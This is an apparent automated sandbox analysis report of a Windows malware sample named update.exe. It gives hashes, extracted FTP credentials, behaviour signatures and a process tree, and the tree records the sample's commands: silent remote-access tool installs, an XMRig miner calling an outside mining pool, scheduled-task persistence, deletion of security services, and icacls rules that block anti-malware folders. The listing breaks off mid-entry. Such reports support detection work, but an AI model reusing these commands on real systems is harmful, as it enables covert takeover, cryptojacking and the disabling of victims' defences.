Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

  • max time kernel
    328s
  • max time network
    357s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    12-11-2021 18:04

General

  • Target

    update.exe

  • Size

    12.0MB

  • MD5

    c5c8d4f5d9f26bac32d43854af721fb3

  • SHA1

    e4119a28baa102a28ff9b681f6bbb0275c9627c7

  • SHA256

    3e32145dca0843c6d5258129821afaaeb653ddef7982912fe85ad4b326807402

  • SHA512

    09f39bccb210f96788193d597463c75d3213afd21ed93ac8c843f150d7cb8630f941f54cd8737cc88177dadeb479e8181b40a7f5219e40c948ff18d1955b4828

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    193.32.188.10
  • Port:
    21
  • Username:
    alex
  • Password:
    easypassword

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • XMRig Miner Payload 2 IoCs
  • ASPack v2.12-2.42 5 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocks application from running via registry modification

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 13 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Stops running service(s) 3 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Modifies file permissions 1 TTPs 56 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 6 IoCs
  • Drops file in System32 directory 3 IoCs
  • autoit_exe 8 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 21 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 2 IoCs
  • Modifies registry class 5 IoCs
  • NTFS ADS 4 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\update.exe
    "C:\Users\Admin\AppData\Local\Temp\update.exe"
    1⤵
    • Drops file in Drivers directory
    • Modifies WinLogon
    • Drops file in Program Files directory
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3196
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      2⤵
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1072
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2804
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:872
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            5⤵
            • Runs .reg file with regedit
            PID:788
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            5⤵
            • Runs .reg file with regedit
            PID:2692
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            5⤵
            • Delays execution with timeout.exe
            PID:2520
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:680
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:1316
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:2020
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            5⤵
            • Views/modifies file attributes
            PID:3792
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            5⤵
            • Views/modifies file attributes
            PID:996
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            5⤵
              PID:3256
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                6⤵
                  PID:1360
              • C:\Windows\SysWOW64\sc.exe
                sc config RManService obj= LocalSystem type= interact type= own
                5⤵
                  PID:1360
                • C:\Windows\SysWOW64\sc.exe
                  sc config RManService DisplayName= "Microsoft Framework"
                  5⤵
                    PID:1732
              • C:\ProgramData\Windows\winit.exe
                "C:\ProgramData\Windows\winit.exe"
                3⤵
                • Executes dropped EXE
                • Checks processor information in registry
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:496
                • C:\Program Files (x86)\Windows Mail\WinMail.exe
                  "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
                  4⤵
                  • Suspicious use of SetWindowsHookEx
                  PID:1580
                  • C:\Program Files\Windows Mail\WinMail.exe
                    "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
                    5⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:2144
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
                  4⤵
                    PID:3948
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 5
                      5⤵
                      • Delays execution with timeout.exe
                      PID:3564
              • C:\programdata\install\cheat.exe
                C:\programdata\install\cheat.exe -pnaxui
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1368
                • C:\ProgramData\Microsoft\Intel\taskhost.exe
                  "C:\ProgramData\Microsoft\Intel\taskhost.exe"
                  3⤵
                  • Executes dropped EXE
                  • NTFS ADS
                  • Suspicious use of SetWindowsHookEx
                  PID:2992
                  • C:\Programdata\RealtekHD\taskhostw.exe
                    C:\Programdata\RealtekHD\taskhostw.exe
                    4⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Suspicious behavior: GetForegroundWindowSpam
                    • Suspicious use of SetWindowsHookEx
                    PID:1788
                    • C:\ProgramData\RealtekHD\taskhost.exe
                      C:\ProgramData\RealtekHD\taskhost.exe
                      5⤵
                      • Executes dropped EXE
                      • NTFS ADS
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of SetWindowsHookEx
                      PID:2240
                      • C:\Programdata\WindowsTask\winlogon.exe
                        C:\Programdata\WindowsTask\winlogon.exe
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        PID:1052
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /C schtasks /query /fo list
                          7⤵
                            PID:868
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /query /fo list
                              8⤵
                                PID:1920
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                            6⤵
                              PID:1096
                              • C:\Windows\system32\ipconfig.exe
                                ipconfig /flushdns
                                7⤵
                                • Gathers network information
                                PID:1372
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c gpupdate /force
                              6⤵
                                PID:2924
                                • C:\Windows\system32\gpupdate.exe
                                  gpupdate /force
                                  7⤵
                                    PID:3004
                                • C:\ProgramData\WindowsTask\MicrosoftHost.exe
                                  C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t1
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of SetWindowsHookEx
                                  PID:1292
                            • C:\ProgramData\Microsoft\Intel\R8.exe
                              C:\ProgramData\Microsoft\Intel\R8.exe
                              4⤵
                              • Executes dropped EXE
                              • Modifies registry class
                              • Suspicious use of SetWindowsHookEx
                              PID:2088
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
                                5⤵
                                  PID:848
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
                                    6⤵
                                      PID:3376
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im Rar.exe
                                        7⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1920
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im Rar.exe
                                        7⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2148
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout 3
                                        7⤵
                                        • Delays execution with timeout.exe
                                        PID:612
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
                                  4⤵
                                  • Drops file in Drivers directory
                                  PID:1276
                                • C:\Windows\SysWOW64\schtasks.exe
                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
                                  4⤵
                                  • Creates scheduled task(s)
                                  PID:788
                                • C:\Windows\SysWOW64\schtasks.exe
                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
                                  4⤵
                                  • Creates scheduled task(s)
                                  PID:3204
                                • C:\Windows\SysWOW64\schtasks.exe
                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
                                  4⤵
                                  • Creates scheduled task(s)
                                  PID:3592
                            • C:\Windows\SysWOW64\schtasks.exe
                              "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
                              2⤵
                              • Creates scheduled task(s)
                              PID:3440
                            • C:\Windows\SysWOW64\schtasks.exe
                              "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
                              2⤵
                              • Creates scheduled task(s)
                              PID:1460
                            • C:\Windows\SysWOW64\schtasks.exe
                              "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
                              2⤵
                              • Creates scheduled task(s)
                              PID:1652
                            • C:\Windows\SysWOW64\schtasks.exe
                              "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
                              2⤵
                              • Creates scheduled task(s)
                              PID:3068
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sc start appidsvc
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2424
                              • C:\Windows\SysWOW64\sc.exe
                                sc start appidsvc
                                3⤵
                                  PID:1836
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sc start appmgmt
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2924
                                • C:\Windows\SysWOW64\sc.exe
                                  sc start appmgmt
                                  3⤵
                                    PID:2904
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
                                  2⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1752
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config appidsvc start= auto
                                    3⤵
                                      PID:3236
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
                                    2⤵
                                      PID:3948
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config appmgmt start= auto
                                        3⤵
                                          PID:2076
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sc delete swprv
                                        2⤵
                                          PID:3796
                                          • C:\Windows\SysWOW64\sc.exe
                                            sc delete swprv
                                            3⤵
                                              PID:1500
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c sc stop mbamservice
                                            2⤵
                                              PID:2208
                                              • C:\Windows\SysWOW64\sc.exe
                                                sc stop mbamservice
                                                3⤵
                                                  PID:2692
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
                                                2⤵
                                                  PID:3736
                                                  • C:\Windows\SysWOW64\sc.exe
                                                    sc stop bytefenceservice
                                                    3⤵
                                                      PID:3260
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
                                                    2⤵
                                                      PID:1416
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        sc delete bytefenceservice
                                                        3⤵
                                                          PID:1048
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c sc delete mbamservice
                                                        2⤵
                                                          PID:1504
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            sc delete mbamservice
                                                            3⤵
                                                              PID:2136
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c sc delete crmsvc
                                                            2⤵
                                                              PID:2280
                                                              • C:\Windows\SysWOW64\sc.exe
                                                                sc delete crmsvc
                                                                3⤵
                                                                  PID:3988
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                2⤵
                                                                  PID:1408
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                    3⤵
                                                                      PID:2176
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
                                                                    2⤵
                                                                      PID:4016
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh advfirewall set allprofiles state on
                                                                        3⤵
                                                                          PID:1300
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                        2⤵
                                                                          PID:4040
                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                            netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                            3⤵
                                                                              PID:492
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                            2⤵
                                                                              PID:3684
                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                3⤵
                                                                                  PID:1068
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                2⤵
                                                                                  PID:3520
                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                    3⤵
                                                                                      PID:1072
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
                                                                                    2⤵
                                                                                      PID:852
                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                        icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
                                                                                        3⤵
                                                                                        • Modifies file permissions
                                                                                        PID:2792
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                      2⤵
                                                                                        PID:2076
                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                          icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                          3⤵
                                                                                          • Modifies file permissions
                                                                                          PID:2688
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
                                                                                        2⤵
                                                                                          PID:888
                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
                                                                                            3⤵
                                                                                            • Modifies file permissions
                                                                                            PID:1096
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
                                                                                          2⤵
                                                                                            PID:3256
                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                              icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
                                                                                              3⤵
                                                                                              • Modifies file permissions
                                                                                              PID:3284
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                            2⤵
                                                                                              PID:2824
                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                3⤵
                                                                                                • Modifies file permissions
                                                                                                PID:968
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                              2⤵
                                                                                                PID:1160
                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                  icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                  3⤵
                                                                                                  • Modifies file permissions
                                                                                                  PID:1236
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
                                                                                                2⤵
                                                                                                  PID:736
                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
                                                                                                    3⤵
                                                                                                    • Modifies file permissions
                                                                                                    PID:1504
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                  2⤵
                                                                                                    PID:1820
                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                      icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                      3⤵
                                                                                                      • Modifies file permissions
                                                                                                      PID:1084
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
                                                                                                    2⤵
                                                                                                      PID:1580
                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                        icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
                                                                                                        3⤵
                                                                                                        • Modifies file permissions
                                                                                                        PID:1048
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
                                                                                                      2⤵
                                                                                                        PID:3304
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          3⤵
                                                                                                            PID:2280
                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                            icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
                                                                                                            3⤵
                                                                                                            • Modifies file permissions
                                                                                                            PID:2904
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                          2⤵
                                                                                                            PID:612
                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                              icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                              3⤵
                                                                                                              • Modifies file permissions
                                                                                                              PID:3620
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                            2⤵
                                                                                                              PID:1384
                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                3⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:1320
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
                                                                                                              2⤵
                                                                                                                PID:2180
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  3⤵
                                                                                                                    PID:852
                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                    icacls c:\programdata\Malwarebytes /deny Admin:(F)
                                                                                                                    3⤵
                                                                                                                    • Modifies file permissions
                                                                                                                    PID:2044
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                  2⤵
                                                                                                                    PID:1732
                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                      icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                      3⤵
                                                                                                                      • Modifies file permissions
                                                                                                                      PID:732
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
                                                                                                                    2⤵
                                                                                                                      PID:1000
                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                        icacls C:\Programdata\MB3Install /deny Admin:(F)
                                                                                                                        3⤵
                                                                                                                        • Modifies file permissions
                                                                                                                        PID:2148
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                      2⤵
                                                                                                                        PID:936
                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                          icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                          3⤵
                                                                                                                          • Modifies file permissions
                                                                                                                          PID:3636
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                        2⤵
                                                                                                                          PID:868
                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                            icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                            3⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:3376
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
                                                                                                                          2⤵
                                                                                                                            PID:1776
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              3⤵
                                                                                                                                PID:2076
                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
                                                                                                                                3⤵
                                                                                                                                • Modifies file permissions
                                                                                                                                PID:1460
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
                                                                                                                              2⤵
                                                                                                                                PID:1724
                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                  icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
                                                                                                                                  3⤵
                                                                                                                                  • Modifies file permissions
                                                                                                                                  PID:3292
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
                                                                                                                                2⤵
                                                                                                                                  PID:1420
                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
                                                                                                                                    3⤵
                                                                                                                                    • Modifies file permissions
                                                                                                                                    PID:3220
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
                                                                                                                                  2⤵
                                                                                                                                    PID:3256
                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                      icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
                                                                                                                                      3⤵
                                                                                                                                      • Modifies file permissions
                                                                                                                                      PID:1436
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                    2⤵
                                                                                                                                      PID:3052
                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                        3⤵
                                                                                                                                        • Modifies file permissions
                                                                                                                                        PID:1072
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
                                                                                                                                      2⤵
                                                                                                                                        PID:788
                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
                                                                                                                                          3⤵
                                                                                                                                          • Modifies file permissions
                                                                                                                                          PID:2120
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
                                                                                                                                        2⤵
                                                                                                                                          PID:1916
                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                            icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
                                                                                                                                            3⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1652
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                          2⤵
                                                                                                                                            PID:3976
                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                              icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                              3⤵
                                                                                                                                              • Modifies file permissions
                                                                                                                                              PID:968
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
